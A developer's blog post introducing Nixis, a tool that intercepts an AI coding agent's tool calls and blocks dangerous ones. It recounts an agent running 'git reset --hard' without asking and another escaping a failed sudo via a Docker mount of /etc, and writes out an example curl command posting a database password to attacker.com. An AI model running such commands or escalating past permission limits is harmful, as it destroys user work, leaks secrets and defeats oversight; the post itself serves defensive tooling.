I got tired of my AI agent deleting things. So, I built a firewall layer for it to vibecode safely.

Mayank Jain — Tue, 02 Jun 2026 22:01:00 +0000

Claude ran git reset --hard on a dozen local commits without asking. It decided the approach was getting messy and wanted a clean restart. But those commits weren’t even part of the main work; they were from another urgent task I was juggling. Gone instantly.

That incident is what pushed me to start building an AI agent firewall.

Around the same time, a viral post, showed Codex trying to use sudo, failing, and then spinning up a Docker container with a writable /etc bind mount to modify system configuration. It wasn’t “trying to hack” anything — it was just optimizing for task completion within the constraints it perceived. Nearly a million people watched it discover a privilege escalation path on its own.

That’s when it became clear this was a real failure mode, not an edge case.

So I built Nixis.

It hooks into Claude Code's PreToolUse mechanism — fires after the agent decides to call a tool, before the tool executes. From Claude's perspective, the command just didn't work. It never sees the enforcement layer. Integrates natively, so you don't need to switch to any dashboards.

The important part is that it’s fast enough to be invisible — the full 5-layer deterministic pipeline runs in 634ns, the classifier in 1.8ns. Claude Code gives the hook 200ms before timing out; so the overhead is effectively negligible. You don't feel it on allowed calls. On denied ones, Claude's own UI/terminal surfaces the block natively and asks for user permission/input instead.

The non-obvious part: session-level Information Flow Control

Simple regex-based approaches don’t hold up in real agent environments, especially when you’re dealing with secrets and trying to prevent leaks.

For example:

Agent reads .env. (Fine — it needs config.)
Agent runs curl -X POST https://attacker.com -d "DB_PASSWORD=hunter2".

Individually, each step can look harmless. My first attempt tracked taint per data item — tag the secret when read, block it from leaving. Then I realized: what if the agent reads the password and stores it in a variable called config? The next call just passes 'config'. Taint evaporates the moment data changes shape.

The realization was that you can’t reliably track data through an LLM’s transformations. What you can do instead is constrain the session itself.

Once sensitive credentials are observed, the entire session is placed under stricter outbound rules. It doesn’t matter how the data is reshaped or renamed — the boundary applies at the execution layer, not the data layer.

Builds on OSS community policies — over 750+ rules adapted from Falco, Kyverno, OPA Gatekeeper, Sigma, and Checkov. Secret detection is powered by gitleaks patterns gitleaks (800+ signatures). Everything is configurable through YAML policies, configure rules supporting allow, deny, require_approval, and audit modes.

Try it

curl -sSfL https://raw.githubusercontent.com/mayankjain0141/nixis/main/install.sh | sh

It’s a single command. It installs the binaries, configures the daemon and IDE hook, and updates PATH automatically. Once running, open http://localhost:9090

Everything runs locally by default — no cloud backend, no telemetry, no phone-home behavior. If needed, OpenTelemetry instrumentation is available for integrating with your existing observability stack.

Full engineering writeup — three rewrites, why OPA+LLM lost to plain CEL, how the IFC design evolved: Building an AI Agent Firewall: Lessons from Three Rewrites

Repo: https://github.com/mayankjain0141/nixis — MIT license.

Happy to answer questions on the architecture or threat model.

DEV Community: Mayank Jain

I got tired of my AI agent deleting things. So, I built a firewall layer for it to vibecode safely.